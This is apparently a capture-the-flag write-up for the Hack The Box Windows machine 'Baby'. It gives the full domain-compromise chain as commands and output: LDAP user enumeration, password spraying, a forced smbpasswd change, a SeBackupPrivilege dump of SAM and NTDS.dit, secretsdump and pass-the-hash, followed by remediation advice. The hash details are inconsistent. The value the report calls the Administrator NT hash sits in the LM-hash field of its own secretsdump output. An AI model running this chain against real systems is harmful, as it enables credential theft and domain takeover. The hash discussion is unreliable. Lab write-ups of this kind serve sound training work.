Hack The Box — Baby

Easy | Windows | Hack The Box

---

Field	Value
Report Date	26 June 2026
Assessed By	RobInTheHood
Target IP	10.129.234.71
Hostname	BABYDC
Domain	baby.vl

---

Table of Contents

1. Executive Summary
2. Scope
3. Methodology
4. Attack Chain Summary
5. Findings
6. Proof of Access
7. Credentials Discovered
8. Impact Assessment
9. Remediation Summary
10. Key Takeaways
11. Tools Used
12. Disclaimer

---

1. Executive Summary

This report documents the compromise workflow for the Hack The Box machine Baby. The objective was to obtain domain-administrator-level access in an authorised lab environment and document the attack path with reproducible evidence.

No credentials are supplied. SMB share enumeration is blocked for the guest account, but anonymous LDAP queries disclose the full domain user roster. One account — Teresa.Bell — carries a careless description field that stores its initial password (BabyStart123!). That credential is rejected for direct logon, but spraying it across the entire user list surfaces Caroline.Robinson in a STATUS_PASSWORD_MUST_CHANGE state.

Forcing a password change over SMB with smbpasswd unlocks the account, granting WinRM access and the user flag. Caroline is a member of BUILTIN\Backup Operators and holds SeBackupPrivilege, which is abused to take a raw backup of the SAM, SYSTEM, and NTDS.dit databases. Offline extraction with secretsdump recovers the local Administrator NT hash, and a pass-the-hash over WinRM completes full domain compromise.

---

2. Scope

Field	Value
Target IP	10.129.234.71
Hostname	BABYDC
Domain	baby.vl
Operating System	Windows Server 2022 Build 20348
Machine Rating	Easy
Environment	Hack The Box — Authorised Training Lab
Assessment Date	26 June 2026
Assessor	RobInTheHood

---

3. Methodology

• Reconnaissance — service discovery and external attack-surface mapping
• Enumeration — anonymous LDAP user enumeration and SMB access checks
• Credential Access — description-field password disclosure and targeted spraying
• Initial Access — forced password change unlocking WinRM
• Privilege Escalation — SeBackupPrivilege abuse to dump credential databases
• Post-Exploitation — pass-the-hash to Administrator and proof collection

---

4. Attack Chain Summary

Phase	Technique	MITRE ATT&CK
Recon	Nmap — DC port profile (53/88/389/445/636/3268/5985/9389)	T1046
Enumeration	Anonymous LDAP user enumeration → full domain roster	T1087.002
Credential Access	Password disclosed in account description field (Teresa.Bell)	T1552.001
Credential Access	Password spraying initial password across the roster	T1110.003
Initial Access	Forced password change on STATUS_PASSWORD_MUST_CHANGE account → WinRM as Caroline.Robinson	T1078.002
Privilege Escalation	SeBackupPrivilege (Backup Operators) → raw SAM/SYSTEM/NTDS.dit backup	T1003.002 · T1003.003
Credential Access	Offline hash extraction with secretsdump → Administrator NT hash	T1003
Post-Exploitation	Pass-the-hash over WinRM as Administrator	T1550.002

---

5. Findings

F-01 — Technical Walkthrough

Reconnaissance

A full TCP port scan returns the classic Windows domain controller profile:

nmap -p- -Pn -oA "$TARGET_full_ports" --min-rate 1000 "$TARGET"

Port	Service
53/tcp	DNS
88/tcp	Kerberos
135/tcp	RPC
139/tcp	NetBIOS
389/tcp	LDAP
445/tcp	SMB
464/tcp	kpasswd
593/tcp	RPC over HTTP
636/tcp	LDAPS
3268/3269	Global Catalog
3389/tcp	RDP
5985/tcp	WinRM (WSMan)
9389/tcp	ADWS

The combination of Kerberos, LDAP, SMB, WinRM, and ADWS confirms a domain controller for baby.vl. With no supplied credentials, enumeration begins against SMB using the guest / anonymous account.

---

Enumeration — SMB Access Denied

The host accepts null authentication, but share enumeration as guest is denied:

nxc smb "$TARGET" -u '' -p '' --shares

SMB   10.129.234.71   445   BABYDC   [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB   10.129.234.71   445   BABYDC   [+] baby.vl\:
SMB   10.129.234.71   445   BABYDC   [-] Error enumerating shares: STATUS_ACCESS_DENIED

SMB gives nothing as guest, so attention shifts to LDAP, which on many DCs still permits anonymous bind for read queries.

---

Enumeration — Anonymous LDAP User Roster

netexec ldap "$TARGET" -u '' -p '' --users

LDAP   10.129.234.71   389   BABYDC   [+] baby.vl\:
LDAP   10.129.234.71   389   BABYDC   [*] Enumerated 9 domain users: baby.vl
-Username-              -Last PW Set-         -Description-
Guest                  <never>               Built-in account for guest access...
Jacqueline.Barnett     2021-11-21 10:11:03
Ashley.Webb            2021-11-21 10:11:03
Hugh.George            2021-11-21 10:11:03
Leonard.Dyer           2021-11-21 10:11:03
Connor.Wilkinson       2021-11-21 10:11:08
Joseph.Hughes          2021-11-21 10:11:08
Kerry.Wilson           2021-11-21 10:11:08
Teresa.Bell            2021-11-21 10:14:37   Set initial password to BabyStart123!

This single query yields two prizes: a clean username list and a password leaked in plain sight inside the description attribute of Teresa.Bell — BabyStart123!.

---

Credential Access — A Dead Credential That Still Matters

The disclosed credential Teresa.Bell : BabyStart123! looks like a foothold, but every authentication surface rejects it:

nxc smb "$TARGET" -u 'Teresa.Bell' -p 'BabyStart123!' --shares
# STATUS_LOGON_FAILURE

evil-winrm -u 'Teresa.Bell' -p 'BabyStart123!' -i "$TARGET"
# WinRM::WinRMAuthorizationError

The wording — “Set initial password” — is the hint. This is the default password handed to every newly provisioned account, not Teresa’s current one. The right move is to spray it across the whole roster, since another account may never have changed it.

---

Credential Access — Spraying the Initial Password

nxc smb "$TARGET" -u users.txt -p 'BabyStart123!'

[-] baby.vl\Jacqueline.Barnett:BabyStart123!   STATUS_LOGON_FAILURE
[-] baby.vl\Ashley.Webb:BabyStart123!          STATUS_LOGON_FAILURE
...
[-] baby.vl\Teresa.Bell:BabyStart123!          STATUS_LOGON_FAILURE
[-] baby.vl\Caroline.Robinson:BabyStart123!    STATUS_PASSWORD_MUST_CHANGE

Every account fails with STATUS_LOGON_FAILURE — except Caroline.Robinson, which returns STATUS_PASSWORD_MUST_CHANGE. This is not a failure: it confirms the password is correct but the account is flagged to change its password at next logon.

---

Initial Access — Forcing the Password Change

A MUST_CHANGE account can have its password rotated by an unauthenticated-style SMB password change, without ever needing the old session. smbpasswd performs exactly this against the DC:

smbpasswd -r "$TARGET" -U "Caroline.Robinson"
# Old SMB password: BabyStart123!
# New SMB password: Password123!
# Retype new SMB password: Password123!
# Password changed for user Caroline.Robinson on 10.129.234.71.

With a known, accepted password, Caroline’s WinRM membership grants an interactive shell:

evil-winrm -u 'Caroline.Robinson' -p 'Password123!' -i "$TARGET"

User Flag

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> type ../Desktop/user.txt
ce894a429620296613d755726bfd6b29

---

Privilege Escalation — Enumerating Caroline’s Power

Group membership shows Caroline belongs to BUILTIN\Backup Operators and the custom BABY\it group:

*Evil-WinRM* PS C:\> whoami /groups

BUILTIN\Backup Operators            Alias   S-1-5-32-551
BUILTIN\Remote Management Users     Alias   S-1-5-32-580
BABY\it                             Group   S-1-5-21-...-1109
Mandatory Label\High Mandatory Level

The privilege list confirms the high-value capability that Backup Operators grants:

*Evil-WinRM* PS C:\> whoami /priv

SeBackupPrivilege             Back up files and directories   Enabled
SeRestorePrivilege            Restore files and directories   Enabled
SeMachineAccountPrivilege     Add workstations to domain      Enabled
SeShutdownPrivilege           Shut down the system            Enabled

SeBackupPrivilege allows reading any file on the system — including locked credential databases — by bypassing DACLs through the backup intent. On a domain controller, that is game over.

---

Privilege Escalation — Backing Up the Credential Stores

First, export the SAM and SYSTEM registry hives (needed to derive the boot key and decrypt local secrets):

*Evil-WinRM* PS C:\> reg save HKLM\SYSTEM SYSTEM.SAV
*Evil-WinRM* PS C:\> reg save HKLM\SAM    SAM.SAV
# The operation completed successfully.

*Evil-WinRM* PS C:\> download SYSTEM.SAV SYSTEM.SAV
*Evil-WinRM* PS C:\> download SAM.SAV    SAM.SAV

The NTDS.dit Active Directory database is locked while the DC is running, so it is exported through a Volume Shadow Copy using ntdsutil’s IFM (Install From Media) feature:

*Evil-WinRM* PS C:\> ntdsutil "ac i ntds" "ifm" "create full ntds" q q
# Creating snapshot...
# IFM media created successfully in C:\Users\Caroline.Robinson\Documents\ntds

*Evil-WinRM* PS C:\> download ntds ntds

The IFM export bundles both ntds.dit and a fresh copy of the SYSTEM hive under registry/, giving everything needed for offline extraction.

---

Credential Access — Offline Hash Extraction

With the SAM, SYSTEM, and NTDS.dit databases on the attacker host, secretsdump decrypts the local account hashes offline:

secretsdump -sam sam -system system -ntds ntds.dit LOCAL

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:ee4457ae59f1e3fbd764e33d9cef123d:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

The Administrator NT hash is recovered: ee4457ae59f1e3fbd764e33d9cef123d.

---

Post-Exploitation — Pass-the-Hash to Administrator

No password cracking is required — the NT hash authenticates directly over WinRM:

evil-winrm -u 'Administrator' -H 'ee4457ae59f1e3fbd764e33d9cef123d' -i "$TARGET"

Root Flag

*Evil-WinRM* PS C:\Users\Administrator\Documents> type "C:/Users/Administrator/Desktop/root.txt"
e04efbb0464b012afd4a44e8010cb25f

---

6. Proof of Access

Level	Evidence
User (Caroline.Robinson)	ce894a429620296613d755726bfd6b29
Root / Administrator (pass-the-hash)	e04efbb0464b012afd4a44e8010cb25f

---

7. Credentials Discovered

Account	Secret	Type	Source
Teresa.Bell	BabyStart123!	Initial domain password	LDAP description field disclosure
Caroline.Robinson	BabyStart123! → Password123!	Domain password (forced change)	Spray + smbpasswd reset
Administrator	ee4457ae59f1e3fbd764e33d9cef123d	NT hash	SeBackupPrivilege → secretsdump

---

8. Impact Assessment

Successful exploitation resulted in complete domain compromise through a chain of misconfigurations and operational hygiene failures rather than software vulnerabilities. Anonymous LDAP disclosed the entire user roster, and a password stored in a user’s description field handed over the organisation’s default provisioning password. Spraying that password surfaced an account stuck in a password-must-change state, which an attacker can rotate at will to gain an interactive foothold.

The decisive escalation is the assignment of SeBackupPrivilege (via Backup Operators) to a low-privilege user on a domain controller. That single privilege permits reading the entire Active Directory credential store (NTDS.dit) and the local SAM, collapsing the distance between a standard user and Domain/Enterprise Administrator without exploiting a single vulnerability.

---

9. Remediation Summary

Priority	Action
Critical	Remove SeBackupPrivilege / Backup Operators membership from standard users on domain controllers. Backup duties belong to dedicated, tightly-monitored service accounts only.
Critical	Never store passwords in AD attributes (description, info, comment). Audit and clear these fields domain-wide and rotate any password they exposed.
High	Disable anonymous LDAP binds; require authentication for directory read access and enable LDAP signing + channel binding.
High	Enforce password change at first logon through a controlled process, and ensure shared/initial passwords are unique per account and expired immediately after provisioning.
Medium	Monitor for ntdsutil IFM operations, raw reg save of HKLM\SAM/HKLM\SYSTEM, and Volume Shadow Copy creation — all strong indicators of credential-store theft.
Medium	Alert on STATUS_PASSWORD_MUST_CHANGE responses and unexpected SMB password-change (smbpasswd) activity.

---

10. Key Takeaways

• When SMB is locked down, LDAP anonymous bind is the next door — it frequently leaks the full user roster and, with it, any secrets administrators left in attribute fields.
• A password labelled “initial” is almost always a default applied to every account. Don’t discard a “dead” credential — spray it across the roster before moving on.
• STATUS_PASSWORD_MUST_CHANGE is a success, not a failure: the password is valid and can be reset over SMB with smbpasswd to claim the account.
• SeBackupPrivilege is a domain-controller crown jewel. It bypasses file DACLs, enabling raw export of SAM, SYSTEM, and a shadow-copied NTDS.dit — the entire directory’s secrets.
• Recovered NT hashes rarely need cracking; pass-the-hash over WinRM authenticates directly as Administrator.

---

11. Tools Used

Tool	Purpose
nmap	Port and service discovery
nxc / netexec	Anonymous LDAP user enumeration, SMB checks, password spraying
smbpasswd	Forcing the password change on the MUST_CHANGE account
evil-winrm	WinRM shell and pass-the-hash authentication
reg	Exporting the SAM and SYSTEM registry hives
ntdsutil	IFM export of NTDS.dit via Volume Shadow Copy
secretsdump	Offline extraction of NT hashes from SAM/SYSTEM/NTDS

---

12. Disclaimer

This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.

---

End of Report — Baby | RobInTheHood | 26 June 2026